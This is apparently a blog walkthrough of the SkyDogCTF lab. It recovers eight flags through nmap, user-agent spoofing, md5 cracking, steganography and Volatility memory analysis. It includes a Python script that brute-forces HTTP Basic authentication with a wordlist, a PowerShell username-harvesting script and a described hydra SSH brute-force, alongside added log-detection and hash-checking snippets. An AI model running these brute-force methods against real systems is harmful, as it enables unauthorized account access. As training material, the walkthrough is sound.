Saturday, December 24, 2016

SkyDogCTF Walkthrough

This is the first time I’ve attempted a CTF.  Here’s a walkthrough for each flag.

Nmap scan…

SSH is on port 22222 – found flag #1: flag{53c82eba31f6d416f331de9162ebe997}

Cracked the hash (md5) – “encrypt”

 findmyhash md5 -h 53c82eba31f6d416f331de9162ebe997  

I pulled the index.html file with wget and found a comment about IE4 and /oldIE/html5.js

Reviewed the js file; the first line is hex…

Decoded the hex and found flag #2 flag{7c0132070a0ef71d542663e9dc1f5dee}

Cracked the hash – “nmap”

DIRB scan… found /personnel

Tried to access /personnel but it seems to be “protected”

I assumed “IE4” was a clue, so I tried accessing /personnel with an IE4 user agent – found flag #3 flag{14e10d570047667f904261e6d08f520f} and another clue. So far so good.

I decided to take a look with FireFox… Agent Hanratty

Cracked the hash – “evidence”. Clue (“new”) + cracked hash (“evidence”) = newevidence

I tried to access /newevidence with IE4 user agent – 401 Unauthorized

Same result using Burp Suite (as a proxy to change the user agent) and FireFox.

Tried to log on with hanratty:hanratty; didn’t work.

What is Agent Hanratty’s first name? Google says it’s Carl

I set up Burp Suite Intruder in an attempt to gain access, but the free version is pretty slow…

… so I wrote a crude script in Python. This let me try several username combinations with a couple of dirb word lists for the password. I got lucky with username “carl.hanratty” and password “Grace”.

 import base64
 import os
 import subprocess

 username = 'carl.hanratty'
 filename = '/usr/share/wordlists/dirb/others/names.txt'
 target = 'http://192.168.12.12/newevidence'
 # headers: the IE4 user agent is what gets past the "protected" check
 useragent = '--user-agent=Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)'
 accept = '--header=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
 acceptlang = '--header=Accept-Language: en-US,en;q=0.5'
 acceptenc = '--header=Accept-Encoding: gzip, deflate'
 connection = '--header=Connection: close'
 with open(filename) as fp:
   for line in fp:
     password = line.rstrip('\n')
     creds = username + ':' + password
     # HTTP Basic auth is base64("user:password"); decode to str for the header
     b64 = base64.b64encode(creds.encode('ascii')).decode('ascii')
     print("Trying %s %s" % (creds, b64))
     auth = '--header=Authorization: Basic %s' % b64
     try:
       # wget exits non-zero on a 401, which raises CalledProcessError
       subprocess.check_output(['wget', target, useragent, accept, acceptlang, acceptenc, connection, auth])
     except subprocess.CalledProcessError:
       pass
     # wget only writes the page to the working directory on success
     if os.path.isfile('/root/Desktop/scripts/newevidence'):
       break
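From the defender’s side, the script above leaves a very recognisable trail: a burst of 401 responses for one path, from one client, all carrying the same IE4 user agent, ending in a 200 when a guess lands. As an added example (not the author’s code), this Python snippet flags such bursts in constructed Apache combined-format log lines; the client addresses, the threshold of five failures and the log lines themselves are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.168.12.50 - - [24/Dec/2016:10:00:01 -0500] "GET /newevidence HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)"
192.168.12.50 - - [24/Dec/2016:10:00:01 -0500] "GET /newevidence HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)"
192.168.12.50 - - [24/Dec/2016:10:00:02 -0500] "GET /newevidence HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)"
192.168.12.50 - - [24/Dec/2016:10:00:02 -0500] "GET /newevidence HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)"
192.168.12.50 - - [24/Dec/2016:10:00:03 -0500] "GET /newevidence HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)"
192.168.12.50 - - [24/Dec/2016:10:00:03 -0500] "GET /newevidence HTTP/1.1" 200 2048 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)"
192.168.12.77 - - [24/Dec/2016:10:00:05 -0500] "GET /personnel HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/50.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_auth_bruteforce(log_text, threshold=5):
    """Return one alert per (client, path) with >= threshold 401s; each alert records
    whether a 200 followed the failures (a credential guess that eventually worked)."""
    failures = defaultdict(int)
    success_after = {}
    uas = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        if rec["status"] == "401":
            failures[key] += 1
            uas[key].add(rec["ua"])
        elif rec["status"] == "200" and failures.get(key, 0) >= 1:
            success_after[key] = True
    alerts = []
    for key, n in failures.items():
        if n >= threshold:
            alerts.append({"ip": key[0], "path": key[1], "failures": n,
                           "succeeded": success_after.get(key, False),
                           "user_agents": sorted(uas[key])})
    return alerts
```

A single fixed user agent across every failed request (here the IE4 string) is a further hint that the requests are scripted rather than coming from a person retyping a password.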

I took a look with FireFox…

Checked out the hyperlink “Evidence Summary File” - found flag #4 flag{117c240d49f54096413dd64280399ea9}

Cracked the hash – “panam”

The hyperlink “Possible Location” points to an image.jpg. I saved it, ran it through binwalk and then steghide with the password “panam”, and found flag #5 flag{d1e5146b171928731385eb7ea38c37b8} and another clue. So far, each cracked hash has been the clue for the next flag, but…

I got stuck here for a bit and tried a bunch of things. I ended up going back to the beginning with nmap.

I wasn’t sure why the server was running HTTPS; everything I had found so far was accessible over HTTP. I took a look using openssl s_client and found flag #6 flag{f82366a9ddc064585d54e3f78bde3221}.

Since it’s labeled “flag3”, I was supposed to find it earlier in the game – better late than never.

Cracked the hash – “personnel” – HA! Yes, this was the clue for earlier. Thank goodness dirb found the directory.

Stuck again… decided to give SSH a whirl… meh.  Brute force here we come…

I tried some standard name lists with various combinations of username formats, using the cracked hashes and clues as passwords. It was taking too long; the username list had too many names. I needed to be more specific…

I wrote a PowerShell script which queried Google for names related to the search strings I provided… (cheating? maybe… I didn’t review the results to see if anything was related to SkyDogCTF).

 $searchstrings = @(
  "%22agent+hanratty%22",
  "%22catch+me+if+you+can%22",
  "%22Dont+go+Home+Frank%22",
  "%22Theres+a+Hex+on+Your+House%22",
  "%22Obscurity+or+Security%22",
  "%22Be+Careful+Agent+Frank+Has+Been+Known+to+Intercept+Traffic+Our+Traffic%22",
  "%22A+Good+Agent+is+Hard+to+Find%22",
  "%22The+Devil+is+in+the+Details+Or+is+it+Dialogue%22",
  "%22if+its+Simple+Guessable+or+Personal+it+Goes+Against+Best+Practices%22",
  "%22Where+in+the+World+is+Frank%22",
  "%22Frank+Was+Caught+on+Camera+Cashing+Checks+and+Yelling%22",
  "%22The+Fastest+Man+Alive%22",
  "%22Franks+Lost+His+Mind+or+Maybe+its+His+Memory%22",
  "%22He+Locked+Himself+Inside+the+Building%22",
  "%22Find+the+Code+to+Unlock+the+Door+Before+He+Gets+Himself+Killed%22",
  "%22encrypt%22",
  "%22nmap%22",
  "%22personnel%22",
  "%22newevidence%22",
  "%22panam%22",
  "%22iheartbrenda%22",
  "%22ILoveFrance%22"
 )
 # one candidate name per line
 $names = Get-Content C:\temp\names.txt
 $googlenames = @()
 $firstnamelastnames = @()
 $googlednames = @()
 $i = 1
 $totalsearches = $searchstrings.Count
 foreach ($searchstring in $searchstrings)
 {
  Write-Host "Searching Google [$i of $totalsearches]... " -ForegroundColor Green
  $googlesays = Invoke-WebRequest "https://www.google.com/search?q=$searchstring" -UserAgent ([Microsoft.PowerShell.Commands.PSUserAgent]::InternetExplorer)
  # keep every name from the list that appears anywhere in the results page
  $googlenames += $names | Where-Object { $googlesays.RawContent.Contains($_) }
  Write-Host " Parsing Results..." -ForegroundColor Cyan
  # look for "firstname lastname" pairs among the matched names
  foreach ($firstname in $googlenames)
  {
   if ($googlesays.RawContent.Contains("$firstname"))
   {
    $googlednames += "$firstname"
   }
   foreach ($lastname in $googlenames)
   {
    if ($googlesays.RawContent.Contains("$firstname $lastname"))
    {
     $firstnamelastnames += "$firstname $lastname"
    }
   }
  }
  Write-Host "...Sleeping" -ForegroundColor Red
  Start-Sleep -Seconds 2
  $i++
 }
 # de-duplicate the pairs, then build username variants: firstlast, first.last, first_last
 $uniquepairs = ($firstnamelastnames | Group-Object).Name
 $firstlast = $uniquepairs.Replace(" ", "")
 $first_dot_last = $uniquepairs.Replace(" ", ".")
 $first_underscore_last = $uniquepairs.Replace(" ", "_")
 # add lower- and upper-case forms of each variant
 $firstlast += $firstlast.ToLower() + $firstlast.ToUpper()
 $first_dot_last += $first_dot_last.ToLower() + $first_dot_last.ToUpper()
 $first_underscore_last += $first_underscore_last.ToLower() + $first_underscore_last.ToUpper()
 $firstlast
 #$first_dot_last
 #$first_underscore_last
 #$googlednames | Group-Object

… this gave me a smaller list of usernames. It was taking about 2 minutes to run ~200 usernames with one password at hydra’s default of 16 tasks. I wasn’t sure of the username format, so I used a couple of variations and ended up with ~600 usernames and 8 passwords. Again, I used the previously cracked hashes and clues for the password list. I kicked hydra off and headed to bed.

The next day… ugh. No hits, but looking back through the logs I saw a bunch of failures, reattempts, etc. To make a long story short, I rebooted the server and tried the user list with each password using the -p switch. I also throttled tasks down to 1. I was finally able to run through the lists with a smaller number of failures/reattempts. I’ll have to revisit this in the future… anyhow, I got a hit.

SSH’d to the server with the credentials for barryallen; found flag #7 flag{bd2f6a1d5242c962a05619c56fa47ba6}

Cracked the hash – “theflash”

The last flag has to be in the security-system.data file, so I downloaded it.

Ran it through binwalk; it appears to be a zip archive.

Unzipped it and ran binwalk again… looks like a memory dump (.dmp)?

Ran it through Volatility.

Dumped the clipboard contents… “666c61677b38343164643364623239623066626264383963376235626537363863646338317d”

Decoded the hex and found flag #8 flag{841dd3db29b0fbbd89c7b5be768cdc81}

Attempted to crack the hash… not a known hash.
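The clipboard string above and the hex line in html5.js were handled the same way: decode the hex, pull out the flag, and check the 32-character md5 inside it against the clues collected so far, which is what findmyhash was doing against online databases. As an added example (not the author’s code), this Python snippet does all three steps offline; the clue wordlist is constructed from words on this page, and the case variants it tries are an assumption.

```python
import hashlib
import re

# Hex string the walkthrough recovered from the memory dump's clipboard.
CLIPBOARD_HEX = "666c61677b38343164643364623239623066626264383963376235626537363863646338317d"

# Constructed wordlist: the cracked hashes and clues collected during the walkthrough.
CLUE_WORDS = ["encrypt", "nmap", "personnel", "newevidence", "panam",
              "iheartbrenda", "ILoveFrance", "theflash"]

# Every flag on this page is flag{<32 hex chars>}, i.e. an md5 digest in braces.
FLAG_RE = re.compile(r"flag\{([0-9a-f]{32})\}")

def decode_hex(hex_text):
    """Decode a hex string (whitespace tolerated) to ASCII text; ValueError on bad input."""
    cleaned = "".join(hex_text.split())
    return bytes.fromhex(cleaned).decode("ascii")

def extract_flags(text):
    """Return every 32-hex-character value found inside flag{...}, in order."""
    return FLAG_RE.findall(text)

def md5_hex(word):
    return hashlib.md5(word.encode("utf-8")).hexdigest()

def crack_md5(digest, wordlist):
    """Return the wordlist entry (exact, lower- or upper-cased) whose md5 equals digest, else None."""
    digest = digest.lower()
    for word in wordlist:
        for candidate in (word, word.lower(), word.upper()):
            if md5_hex(candidate) == digest:
                return candidate
    return None

def flags_from_hex(hex_text, wordlist=CLUE_WORDS):
    """Decode hex, extract flags, and pair each digest with its cracked word (or None)."""
    text = decode_hex(hex_text)
    return [(digest, crack_md5(digest, wordlist)) for digest in extract_flags(text)]

if __name__ == "__main__":
    for digest, word in flags_from_hex(CLIPBOARD_HEX):
        print("flag{%s} -> %s" % (digest, word if word else "not in wordlist"))
```

For the final flag the wordlist comes back empty, matching the walkthrough’s result that the hash is not a known one.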